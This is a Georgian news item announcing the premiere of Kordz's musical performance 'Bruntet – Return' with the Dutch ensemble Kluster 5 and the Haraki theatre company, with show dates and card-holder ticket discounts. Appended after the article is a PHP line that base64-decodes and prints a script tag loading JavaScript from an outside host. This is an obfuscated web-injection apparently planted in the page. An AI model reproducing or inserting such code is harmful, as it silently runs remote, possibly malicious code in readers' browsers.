celsiusi
ავერსი საქკაბელი

თიბისი კონცეპტი, „მასტერქარდისა“ და Stockton ერთობლივი თანამშრომლობის ფარგლებში საზოგადოებას მუსიკალურ სპექტაკლის „ბრუნტეტი - დაბრუნება“ პრემიერაზე იწვევს.

„თიბისის“ ცნობით, წარმოდგენაზე მაყურებლებს საშუალება ექნებათ, 5 წლის ალექსანდრე კორძაიას (kordz) წარმოსახვით სამყაროში იმოგზაურონ.
მათივე განმარტებით, სპექტაკლი დაფუძნებულია Kordz-ის ნაწარმოებზე „1999“.
„სპექტაკლი 2021 წელს შეიქმნა ჰოლანდიური ანსამბლისთვის “Kluster 5” და მასში გამოყენებულია 1999 წლის აუდიო-ჩანაწერები. ამ ჩანაწერებში, 5 წლის kordz-ი გვიყვება მის წარმოსახვით სამყარო - ბრუნტეტზე, ბრუნტეტის მცხოვრებლებსა და მის გონებაში დალექილ სხვადასხვა საინტერესო თემაზე. სპექტაკლი 5,6 და 7 თებერვალს თეატრში „ჰარაკი“, ხოლო 11 თებერვალს კი, Silk Factory Studio-ში გაიმართება. მუსიკოსები არიან: kordz & ანსამბლი Kluster 5 (ჰააგა, ნიდერლანდები). პროექტის თეატრალურ მიმართულებაზე „ჰარაკი“-ს გუნდმა (თეატრალური კომპანია) და რეჟისორმა, სანდრო კალანდაძემ იმუშავეს. მსახიობები არიან: ანასტასია ჭანტურაია, ანანო მახარაძე, ნატალია გაბისონია, ბექა ხაჩიძე, გიორგი რაზმაძე,თემო რეხვიაშვილი.
ბილეთების წინასწარი გაყიდვა დაიწყება 25 იანვარს და 3 დღის განმავლობაში ხელმისაწვდომი იქნება მხოლოდ „თიბისი“ კონცეპტის „მასტერქარდ“ ბარათის მფლობელებისთვის, 15%-იანი ფასდაკლებით. 28 იანვრიდან „თიბისი“ კონცეპტის ბარათის მფლობელებისთვის იმოქმედებს 15%-იანი ფასდაკლება, ხოლო „თიბისი მასტერქარდ“ ბარათის მფლობელებისთვის 10%. ფასდაკლება არ ვრცელდება „თიბისის“ ერთგულის ბარათებზე. ბილეთები შეგიძლიათ შეიძინოთ: tkt.ge მხარდამჭერები: Pro Helvetia (შვეიცარია), „თიბისი კონცეპტი“, „მასტერქარდი“, „ლექსუსი“ და თბილისის მერია,-აღნიშნულია ინფორმაციაში.
 
628
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");